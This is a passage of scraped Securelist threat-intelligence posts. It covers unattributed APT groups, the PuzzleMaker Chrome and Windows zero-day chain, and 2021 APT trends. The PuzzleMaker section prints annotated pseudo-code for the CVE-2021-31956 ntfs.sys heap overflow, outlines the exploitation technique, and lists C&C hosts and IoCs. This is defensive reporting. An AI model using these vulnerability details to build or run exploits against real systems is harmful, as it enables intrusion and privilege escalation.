malware](<https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465/>) was dropped with a zero-day PDF exploit conspicuously named "Visaform Turkey.pdf". DarkUniverse remains unattributed, and it is unclear what happened to the actor after 2017.\n\n## 3\\. PuzzleMaker\n\nIn April 2021, we [detected several targeted attacks](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) using a complex chain of zero-day exploits. To penetrate the system, the actor used a Google Chrome RCE vulnerability. 
We were not able to obtain the exploit, but suspected the flaw in question was [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>), which enabled an attacker to execute arbitrary code inside the browser sandbox. Once inside, the actor exploited [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), an information disclosure vulnerability in the Windows kernel, to obtain the kernel address of the EPROCESS structure, and elevated privileges using one more Windows kernel flaw, [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>).\n\nAfter successful exploitation of these vulnerabilities, custom malware consisting of four modules is delivered to the infected system. The modules are a stager, dropper, service, and remote shell, with the last one being the final payload. We dubbed the APT "PuzzleMaker".\n\nThe only weak link to known APT campaigns is a post-exploitation technique that is used both by PuzzleMaker and the CHAINSHOT malware, and by at least two state-sponsored threat actors. However, the technique is publicly known and can be used by various groups independently.\n\n## 4\\. ProjectSauron (aka Strider)\n\nProjectSauron was [first discovered](<https://securelist.com/faq-the-projectsauron-apt/75533/>) in September 2015, when [Kaspersky Anti-Targeted Attack Platform](<https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform>) detected anomalous network traffic in a customer organization. The traffic originated from a suspicious library loaded into the memory of a domain controller server and registered as a Windows password filter, which has access to plain-text passwords to administrative accounts. 
It proved to be a part of a complex APT platform targeting government, telecommunication, scientific, military, and financial organizations in Russia, Iran, Rwanda, and possibly, Italian-speaking countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125545/TOP-_10_unattributed_APT_mysteries_01.png>)\n\n**_ProjectSauron got its name from the "Sauron" mentioned in its configuration_**\n\nThe ProjectSauron platform has a modular structure. Its core implants are unique to each victim, with different file names and sizes, and timestamps tailored to the target environment. This way, the artifacts discovered in one organization are of low value to other victims. These core implants act as backdoors that download additional modules and run commands inside the memory. The modules perform specific espionage functions, such as keylogging, stealing documents, or hijacking encryption keys from infected computers and attached USB devices. A special module is responsible for accessing air-gapped systems through infected USB drives.\n\nThe threat actor behind ProjectSauron uses a complex command-and-control infrastructure involving a wide range of different ISPs and a number of IP addresses across the US and Europe. The actor made every possible effort not to create recognizable patterns in its operations. The only thing that can be said with confidence is that this level of sophistication is hardly achievable without a nation-state sponsor. 
It is also worth noting that the actor probably learned from other high-profile APTs, such as [Duqu](<https://securelist.com/the-mystery-of-duqu-part-ten/32668/>), [Flame](<https://securelist.com/the-flame-questions-and-answers/34344/>), [Equation](<https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/>), and [Regin](<https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06125628/TOP-_10_unattributed_APT_mysteries_02.gif>)\n\n## 5\\. USB Thief\n\nIn 2016, our colleagues at ESET [discovered a type of USB malware](<https://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/>) that featured a tricky self-protection mechanism. Dubbed "USB Thief", it consisted of six files, two of which were configuration files, while the other four were executables. The files were designed to be executed in a pre-defined order, and some of them were AES128-encrypted. The encryption key was generated using a unique USB device ID and certain disk properties. This made it hard to decrypt and run the files anywhere but on the infected USB drive.\n\nThree of the executable files are loaders that load the next-stage file. To ensure that the files are loaded in the correct order, they use hashes of the previously loaded files as their names. Additionally, some of the files check the name of the parent process and terminate if it is wrong. The final payload is a data stealer that looks to the configuration file for information about what data to exfiltrate, how to encrypt it, and where to store it. The data is always exfiltrated to a location on the infected USB device.\n\nAnother interesting technique implemented in USB Thief is using portable versions of certain applications, such as Notepad, Firefox, and TrueCrypt, to trick the user into running the first malware loader. 
To achieve this goal, it injects itself into the command chain of these applications as a plugin or a dynamic-link library. When the user runs the infected app, the malware launches, too. The malware is not widespread and is most likely used in highly targeted attacks involving a human asset.\n\nSince my post on Twitter, [our colleagues at ESET shared further information](<https://twitter.com/0xfmz/status/1573321520570671105>) on this toolset, which includes their suspicion that it might be associated with the Lamberts APT group:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130040/TOP-_10_unattributed_APT_mysteries_03.png>)\n\n## 6\\. TENSHO (aka White Tur)\n\nIn early 2021, while searching for phishing pages that spoofed governmental websites, researchers at the PwC company [stumbled across a page](<https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html>) used to phish for Serbian Ministry of Defense credentials. This page led them to a previously unknown threat actor dubbed "TENSHO" or "White Tur". This actor has been active since at least 2017 and uses a variety of unique techniques and tools, which include weaponized documents, HTA and PowerShell scripts, Windows executables, and phishing pages that mimic governmental websites.\n\nAmong other tools, TENSHO uses the OpenHardwareMonitor open-source project, whose legitimate purpose is to monitor device temperature, fan speed, and other hardware health data. The threat actor spreads a malicious OpenHardwareMonitor package designed to deliver TENSHO's malware in the form of a PowerShell script or Windows binary.\n\nTo date, no ties have been discovered between this threat actor and any known APT group. TENSHO targets organizations inside Serbia and Republika Srpska (an entity in Bosnia and Herzegovina), indicating a very specific regional interest. 
Because many parties might be interested in targeting these regions, it is not easy to attribute the threat.\n\n## 7\\. PlexingEagle\n\nDuring the HITBSec 2017 conference in Amsterdam, Emmanuel Gadaix presented the discovery of a highly interesting GSM cyberespionage toolset, likely deployed by a very advanced threat actor, found during a routine security sweep in a client's systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130131/TOP-_10_unattributed_APT_mysteries_04.png>)\n\n**_[A Surprise Encounter With a Telco APT](<https://conference.hitb.org/hitbsecconf2017ams/materials/D2T4%20-%20Emmanuel%20Gadaix%20-%20A%20Surprise%20Encounter%20With%20a%20Telco%20APT.pdf>), by courtesy of Emmanuel Gadaix_**\n\nThe compromise was originally discovered by Gadaix's team on a Solaris 10 machine that was used by the actors as an operating base. From there, the attackers leveraged advanced knowledge of the GSM infrastructure and network to patch the functionality normally used by law enforcement for eavesdropping on phone calls in order to implement their own mechanisms for intercepting calls of interest. The malware used in the intrusion was written using Lua, a language we saw used by other advanced threat actors, such as the ones behind Flame and ProjectSauron. In his presentation, Gadaix hints at a number of similarities between this case and the so-called "Athens Affair", the two being the only known cases of this threat actor actually being caught in the wild.\n\n## 8\\. SinSono\n\nIn May 2021, Syniverse, a telecom company that provides text message routing services to such carriers as AT&T, Verizon, T-Mobile, and others, detected [unauthorized access to its IT systems](<https://www.theverge.com/2021/10/6/22713543/syniverse-hack-five-years-text-messages>). An internal investigation revealed that an unknown adversary first penetrated Syniverse's infrastructure in 2016. 
For five years they had acted undetected, accessed internal databases, and managed to compromise about 235 customers' login credentials for the company's Electronic Data Transfer (EDT) environment. Through these accounts, the threat actor could access highly sensitive consumer data, e.g., call records and the contents of text messages.\n\nWhile the company reset or inactivated credentials for all EDT customers, and contacted affected organizations, many questions remain: for instance, if the actor had actually stolen sensitive data or not. Although the company itself and some of the carriers relying on its services see no indicators of a major breach and no attempt to disrupt their processes, we know neither who the actor was nor what their goals were. Our analysis of the data related to the attack indicates a high degree of attention and care regarding operational security and ensuring that attribution is difficult.\n\n## 9\\. MagicScroll (aka AcidBox)\n\nMagicScroll is a sophisticated malicious framework that was [first detected](<https://unit42.paloaltonetworks.com/acidbox-rare-malware/>) by Palo Alto's Unit 42 in 2019. It is a type of multistage malware with only a few known samples and one known victim, located in Russia and attacked in 2017. The initial infection stage of MagicScroll is missing. The first known stage is a loader that was created as a [security support provider](<https://learn.microsoft.com/en-us/windows/win32/secauthn/custom-security-packages>), a DLL that usually provides certain security features, such as application authentication. MagicScroll abuses this functionality to achieve injection into the lsass.exe process and probably persistence as well.\n\nThe loader's main purpose is to decrypt and load the next-stage module, which is stored in the registry. This module exploits a VirtualBox driver vulnerability to load an unsigned malicious driver in kernel mode. 
According to Unit 42, the exploitation of this vulnerability was previously observed in [Turla](<https://securelist.com/tag/turla/>) operations; however, there is no indication that the new actor has any links to that group. Unit 42 also found some loose similarities with [ProjectSauron](<https://securelist.com/faq-the-projectsauron-apt/75533/>), but they stated that these are too weak for considering the two campaigns linked. Neither have we found any ties between MagicScroll and any other known APTs.\n\n## 10\\. Metador\n\nThe Metador threat actor was [first publicly described](<https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/>) by SentinelLabs in September 2022. It mainly targets ISPs, telecommunication companies, and universities in several countries in the Middle East and Africa; at least one of its victims has been attacked by nearly ten different APT groups.\n\nMetador operates two malware platforms dubbed "metaMain" and "Mafalda", which are deployed purely in memory. The metaMain platform is a feature-rich backdoor, which provides the threat actor with long-term access to the infected system. It can log keyboard and mouse events, make screenshots, download and upload files, and execute arbitrary shellcode.\n\nMafalda is a backdoor that is being actively developed. Its latest version was compiled with a timestamp of December 2021. It features a number of anti-analysis techniques and supports 67 commands, which is 13 more than in the previous version of the malware.\n\nApart from typical backdoor functionality, metaMain and Mafalda are capable of establishing connections to other (yet unknown) implants and exchanging data with these. One of those implants is called "Cryshell" and acts as an intermediate server between metaMain or Mafalda, and the C2. 
There are reasons to believe that unknown Linux implants exist that can send data collected from Linux machines to Mafalda.\n\nIt is yet to be established who the actor behind Metador is and what their goals are. The sophisticated malware designed to stay undetected for a long time suggests that this is a cyberespionage campaign by a high-end threat actor. At least some of the C2 responses are in Spanish, which may indicate that the actor or some of its developers speak Spanish. Also, some cultural references were found in Metador's malware, including British pop punk lyrics and Argentinian political cartoons. The diversity of traces makes it difficult to determine in which state's interests it operates\u2014if at all. One of the hypotheses is that the group is a high-end contractor.\n\n## Conclusion\n\nAdvanced threat actors use every possible means to stay undetected, and\u2014if caught\u2014unattributed. Every now and then, security researchers will reveal a mysterious campaign that has remained uncovered for years and that is nearly impossible to trace back to its benefactors with certitude. The ten stories described in this post are just some of the many unattributed mysteries we have seen through the years. 
That is why it is important to discuss them and share data on them within the cybersecurity community.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-07T10:00:47", "type": "securelist", "title": "TOP 10 unattributed APT mysteries", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2022-10-07T10:00:47", "id": "SECURELIST:8BBBF7B71E6D52B912070367475B6567", "href": "https://securelist.com/top-10-unattributed-apt-mysteries/107676/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T08:32:02", "description": "\n\nOn April 14-15, 2021, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. 
While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges.\n\nThe elevation of privilege exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, 2021, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the elevation of privilege vulnerability. Both vulnerabilities were patched on June 8, 2021, as part of the June Patch Tuesday.\n\n## Remote code execution exploit\n\nAll of the observed attacks were conducted through the Chrome browser. Unfortunately, we were unable to retrieve the JavaScript with the full exploit code, but the timeframe of the attacks and the events preceding them led us to suspect one particular vulnerability.\n\nOn April 6-8, 2021, the Pwn2Own competition took place. This is a computer hacking contest where the Google Chrome web browser was one of the targets. According to the ZDI (Zero Day Initiative, the organizer of Pwn2Own) [website](<https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results>), one participating team was able to demonstrate successful exploitation of the Chrome renderer process using a Typer Mismatch bug.\n\nOn April 12, 2021, the developers of Chromium committed two Typer-related bug fixes (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>), issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>)) to the open-source repository of V8 \u2013 a JavaScript engine used by Chrome and Chromium web browsers. 
One of these bug fixes (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>)) was intended to patch a vulnerability that was used during Pwn2Own, and both bug fixes were committed together with regression tests \u2013 JavaScript files to trigger these vulnerabilities. Later on the same day, a user with the Twitter handle @r4j0x00 published a working remote code execution exploit on GitHub, targeting an up-to-date version of Google Chrome. That exploit used a vulnerability from issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>) to execute shellcode in the context of the browser renderer process.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122836/PuzzleMaker_attacks_01.png>)\n\n**_Screenshot of tweet with Chrome zero-day published on April 12, 2021_**\n\nThe published exploit didn't contain a sandbox escape exploit and was therefore intended to work only when the browser was launched with the command line option _-no-sandbox_.\n\nOn April 13, 2021, Google released Chrome update 89.0.4389.128 for Windows, Mac and Linux with a fix for two vulnerabilities; CVE-2021-21220 (used during Pwn2Own) was one of them.\n\nSome of our customers who were attacked on April 14-15, 2021, already had their Chrome browser updated to 89.0.4389.128, and that's why we think the attackers didn't use CVE-2021-21220 in their attacks.\n\nOn April 14, 2021, Google released Chrome update 90.0.4430.72 for Windows, Mac and Linux with a fix for 37 vulnerabilities. 
On the same day, a new Chrome exploit was presented to the public.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122912/PuzzleMaker_attacks_02.png>)\n\n**_Screenshot of GitHub repository with Chrome zero-day published on April 14, 2021_**\n\nThis newly published exploit used a vulnerability from issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>), worked on the newly released Chrome 90.0.4430.72, and was fixed as CVE-2021-21224 only a few days later, on April 20, 2021.\n\nWe suspect the attackers were also able to use this regression-test JavaScript file to develop the exploit (or acquire it from someone else) and were probably using CVE-2021-21224 in their attacks.\n\n## Elevation of privilege exploit\n\nCVE-2021-31955 is an information disclosure vulnerability in ntoskrnl.exe. The vulnerability is related to a Windows OS feature called SuperFetch. It was introduced in Windows Vista and aims to reduce software loading times by pre-loading commonly used applications into memory. For SuperFetch purposes, the function _NtQuerySystemInformation_ implements a special system information class _SystemSuperfetchInformation_. This system information class incorporates more than a dozen different SuperFetch information classes. 
The vulnerability lies in the fact that data returned by the _NtQuerySystemInformation_ function for the SuperFetch information class _SuperfetchPrivSourceQuery_ contains EPROCESS kernel addresses for currently running processes.\n\nIt's noteworthy that this vulnerability can be observed in code that was available on [GitHub](<https://github.com/zodiacon/WindowsInternals/blob/master/MemInfo/MemInfo.cpp>) for a few years before we caught it in the wild and Microsoft patched it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122949/PuzzleMaker_attacks_03.png>)\n\n**_CVE-2021-31955 can be observed in the source code of the MemInfo utility_**\n\nThe other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function _NtfsQueryEaUserEaList_ processes a list of extended attributes for a file and stores the retrieved values in a buffer. This function is accessible via an _ntoskrnl_ syscall, and among other things the caller controls the size of the output buffer. If the size of an extended attribute is not aligned, the function calculates padding so that the next extended attribute is stored 32-bit aligned. The code checks whether the output buffer is long enough to fit the extended attribute with padding, but it doesn't check for a possible integer underflow. 
As a result, a heap-based buffer overflow can happen.\n \n \n for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry )\n {\n ...\n \n out_buf_pos = (DWORD *)(out_buf + padding + occupied_length);\n \n if ( NtfsLocateEaByName(eas_blocks_for_file, eas_blocks_size, &name, &ea_block_pos) )\n {\n \tea_block = eas_blocks_for_file + ea_block_pos;\n \tea_block_size = ea_block->DataLength + ea_block->NameLength + 9;\n \tif ( ea_block_size <= out_buf_length - padding ) // integer-underflow is possible\n \t{\n \tmemmove(out_buf_pos, (const void *)ea_block, ea_block_size); // heap buffer overflow\n \t*out_buf_pos = 0;\n \t}\n }\n else\n {\n \t...\n }\n \n ...\n \n occupied_length += ea_block_size + padding;\n out_buf_length -= ea_block_size + padding;\n padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;\n \n ...\n }\n\n**_Pseudo-code for vulnerable code in function NtfsQueryEaUserEaList_**\n\nThe exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.\n\nAs the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post exploitation technique to steal SYSTEM token. However, the exploit uses a rarely used "PreviousMode" technique instead. We have seen this technique used by the CHAINSHOT framework and even made a [presentation](<https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>) about it at CanSecWest/BlueHat in 2019. 
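The underflow in that size check is easiest to see by replaying the loop's arithmetic. The C model below is an added example, not Kaspersky's analysis code and not the ntfs.sys source: it reproduces only the size bookkeeping from the pseudo-code above on constructed EA lengths (the 14-byte and 16-byte entries and the 15/16/32-byte buffers are assumptions), running the vulnerable check side by side with a hardened one that also guards the padding.

```c
/* Added model of the CVE-2021-31956 bounds check in NtfsQueryEaUserEaList.
 * This is NOT ntfs.sys code and not Kaspersky's: it replays only the size
 * arithmetic from the pseudo-code on constructed EA sizes in user mode, so no
 * memory is actually overwritten; the EA lengths and buffer sizes are made up. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for the two EA block fields the pseudo-code reads. */
typedef struct {
    uint32_t name_length;
    uint32_t data_length;
} ea_block_t;

/* Outcome of replaying the loop against one output-buffer size. */
typedef struct {
    uint32_t copied;         /* entries the check allowed memmove to copy */
    uint32_t overflow_bytes; /* bytes the copy would write past the buffer end */
    bool     underflowed;    /* out_buf_length - padding wrapped around */
} replay_t;

/* Stored size of one EA entry, as in the pseudo-code: 8-byte header + name + data + NUL. */
static uint32_t ea_block_size(const ea_block_t *ea)
{
    return ea->data_length + ea->name_length + 9;
}

/* Replay the loop. hardened=false is the vulnerable check
 * (ea_block_size <= out_buf_length - padding); hardened=true adds the
 * missing guard that the remaining length still covers the padding. */
static replay_t replay_query(const ea_block_t *eas, size_t count,
                             uint32_t out_buf_length, bool hardened)
{
    replay_t r = {0, 0, false};
    const uint32_t buffer_total = out_buf_length;
    uint32_t occupied_length = 0;
    uint32_t padding = 0;   /* first entry needs no alignment padding */

    for (size_t i = 0; i < count; i++) {
        uint32_t size = ea_block_size(&eas[i]);
        /* Unsigned subtraction: wraps to ~4 GiB when out_buf_length < padding. */
        uint32_t remaining = out_buf_length - padding;
        if (out_buf_length < padding)
            r.underflowed = true;

        bool allowed = hardened
            ? (padding <= out_buf_length && size <= remaining)
            : (size <= remaining);          /* the CVE-2021-31956 check */
        if (!allowed)
            break;

        /* memmove target is out_buf + padding + occupied_length; see where it ends. */
        uint64_t write_end = (uint64_t)occupied_length + padding + size;
        r.copied++;
        if (write_end > buffer_total) {
            r.overflow_bytes = (uint32_t)(write_end - buffer_total);
            break;          /* in the kernel this is the heap overflow */
        }

        occupied_length += size + padding;
        out_buf_length -= size + padding;
        padding = ((size + 3) & 0xFFFFFFFCu) - size; /* align next entry to 32 bits */
    }
    return r;
}

/* Constructed two-entry EA list: a 14-byte entry (needs 2 bytes of padding), then a 16-byte one. */
static replay_t scenario(uint32_t out_buf_length, bool hardened)
{
    static const ea_block_t eas[] = {
        {1, 4},   /* 1 + 4 + 9 = 14 bytes -> padding 2 */
        {2, 5},   /* 2 + 5 + 9 = 16 bytes */
    };
    return replay_query(eas, sizeof eas / sizeof eas[0], out_buf_length, hardened);
}

int main(void)
{
    const uint32_t sizes[] = {15, 16, 32};
    for (size_t i = 0; i < 3; i++) {
        replay_t v = scenario(sizes[i], false);
        replay_t h = scenario(sizes[i], true);
        printf("buffer %2u: vulnerable copied=%u overflow=%u underflow=%d | "
               "hardened copied=%u overflow=%u\n",
               sizes[i], v.copied, v.overflow_bytes, v.underflowed,
               h.copied, h.overflow_bytes);
    }
    return 0;
}
```

With a 15-byte buffer the 14-byte entry leaves 1 byte but the next entry needs 2 bytes of padding, so `out_buf_length - padding` wraps and the vulnerable check admits a 16-byte copy ending 17 bytes past the buffer; the hardened check stops after the first entry.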
The exploit uses this technique to inject a malware module into the system process and execute it.\n\n## Malware modules\n\nBesides the aforementioned exploits, the full attack chain consists of four additional malware modules, which will be referred to as:\n\n * Stager\n * Dropper\n * Service\n * Remote shell\n\nThe stager module is used to notify that exploitation was successful. It also downloads and executes a more complex malware dropper module from a remote server. Each stager module is delivered to the victim with a personalized configuration blob that defines the C&C URL, Session ID, keys to decrypt the next stage of malware, and other information.\n\nAll the stager module samples that we've discovered so far were configured to use the same URL address \u2013 hxxps://p{removed}/metrika_upload/index.php \u2013 to download the encrypted malware dropper module.\n\nWe believe there is a chance that the remote code execution JavaScript exploit was also hosted on the same legitimate-looking geopolitical news portal, but we found no evidence of a classic watering hole attack. The victimology suggests a highly targeted delivery of exploits.\n\nThe dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack. We couldn't find any similarities between this and other known malware.\n\nThe remote shell module has a hardcoded URL of the C&C server inside (media-seoengine[.]com). All the communication between C&C server and client is authorized and encrypted. 
The remote shell module is able to download and upload files, create processes, sleep for specified amounts of time and delete itself from the compromised machine.\n\nNone of the artifacts we analyzed appear to have strong connections to any known threat actors. The only similarity to CHAINSHOT we observed is the "PreviousMode" technique, although this is publicly known and may be used by various groups. We are calling the threat actor behind these attacks PuzzleMaker.\n\nKaspersky products detect this exploit and malware modules with the verdicts:\n\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * UDS:DangerousObject.Multi.Generic\n\nKaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected many zero-days, repeatedly proving their effectiveness. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.\n\nMore information about these attacks and the actor behind them is available to customers of the Kaspersky Intelligence Reporting service. 
Contact: intelreports@kaspersky.com.\n\nKaspersky would like to thank Microsoft for their prompt analysis of the report and patches.\n\n## IoCs\n\nmedia-seoengine[.]com\n\n**%SYSTEM%\\WmiPrvMon.exe**\n\n**%SYSTEM%\\wmimon.dll**", "cvss3": {}, "published": "2021-06-08T17:32:30", "type": "securelist", "title": "PuzzleMaker attacks with Chrome zero-day exploit chain", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-21220", "CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-06-08T17:32:30", "id": "SECURELIST:8E9198BF0E389572981DD1AA05D0708A", "href": "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T10:36:53", "description": "\n\nIn the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters; you can find our quarterly overviews [here](<https://securelist.com/apt-trends-report-q1-2021/101967/>), [here](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and 
[here](<https://securelist.com/apt-trends-report-q3-2021/104708/>). For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility into the threat landscape, and it's important to note that no single vendor has complete visibility into the activities of all threat actors.\n\n## Private sector vendors play a significant role in the threat landscape\n\nPossibly the biggest story of 2021, an investigation by the Guardian and 16 other media organizations, published in July, suggested that over 30,000 human rights activists, journalists and lawyers across the world may have been targeted using Pegasus. The report, called [Pegasus Project](<https://www.amnesty.org/en/latest/press-release/2021/07/the-pegasus-project/>), alleged that the software uses a variety of exploits, including several iOS zero-click zero-days. Based on forensic analysis of numerous mobile devices, Amnesty International's Security Lab found that the software was repeatedly used in an abusive manner for surveillance. The list of targeted individuals includes 14 world leaders. Later that month, [representatives from the Israeli government visited the offices of NSO](<https://www.theguardian.com/news/2021/jul/29/israeli-authorities-inspect-nso-group-offices-after-pegasus-revelations>) as part of an investigation into the claims. And in October, India's Supreme Court commissioned a technical committee [to investigate whether the government had used Pegasus to spy on its citizens](<https://www.theregister.com/2021/10/29/india_nso_pegasus_probe/>). 
In November, Apple announced that it was taking [legal action against NSO Group](<https://www.theguardian.com/technology/2021/nov/23/apple-sues-israeli-cyber-firm-nso-group>) for developing software that targets its users with "malicious malware and spyware".\n\nDetecting infection traces from Pegasus and other advanced mobile malware is very tricky, and complicated by the security features of modern OSs such as iOS and Android. Based on our observations, this is further complicated by the deployment of non-persistent malware, which leaves almost no traces after reboot. Since many forensics frameworks require a device jailbreak, which involves a reboot, the malware is removed from memory before it can be examined. Currently, several methods can be used to detect Pegasus and other mobile malware. [MVT (Mobile Verification Toolkit)](<https://github.com/mvt-project/mvt>) from Amnesty International is free, open source and allows technologists and investigators to inspect mobile phones for signs of infection. MVT is further boosted by a list of IoCs (indicators of compromise) collected from high-profile cases and made available by Amnesty International.\n\n## Supply-chain attacks\n\nThere have been a number of high-profile supply-chain attacks in the last 12 months. Last December, it was reported that SolarWinds, a well-known IT managed services provider, had fallen victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor named Sunburst on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nNot all supply-chain attacks have been that sophisticated. 
Early this year, an APT group that we track as BountyGlad compromised a certificate authority in Mongolia and replaced the digital certificate management client software with a malicious downloader. Related infrastructure was identified and found to have been used in multiple other incidents: this included server-side attacks on WebSphere and WebLogic services in Hong Kong, and Trojanized Flash Player installers on the client side.\n\nWhile investigating the artefacts of a supply-chain attack on an Asian government Certification Authority's website, we discovered a Trojanized package that dates back to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins that were deployed using PhantomNet malware, which were in turn delivered using the aforementioned Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware.\n\nIn April 2021, Codecov, a provider of code coverage solutions, publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between January 31 and April 1. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports and send the results to the Codecov infrastructure. This script compromise effectively constitutes a supply-chain attack.\n\nEarlier this year we discovered [Lazarus group](<https://securelist.com/tag/lazarus/>) campaigns using an updated DeathNote cluster. Our investigation revealed indications that point to Lazarus building supply-chain attack capabilities. In one case we found that the infection chain stemmed from legitimate South Korean security software executing a malicious payload; and in the second case, the target was a company developing asset monitoring solutions, an atypical victim for Lazarus. 
As part of the infection chain, Lazarus used a downloader named Racket, which they signed using a stolen certificate. The actor compromised vulnerable web servers and uploaded several scripts to filter and control the malicious implants on successfully breached victim machines.\n\nA previously unknown, suspected Chinese-speaking APT modified a fingerprint scanner software installer package on a distribution server in a country in East Asia. The APT modified a configuration file and added a DLL with a .NET version of a PlugX injector to the installer package. Employees of the central government in this country are required to use this biometric package to track attendance. We refer to this supply-chain incident and this particular PlugX variant as SmudgeX. The Trojanized installer appears to have been staged on the distribution server from March through June.\n\n## Exploiting vulnerabilities\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. 
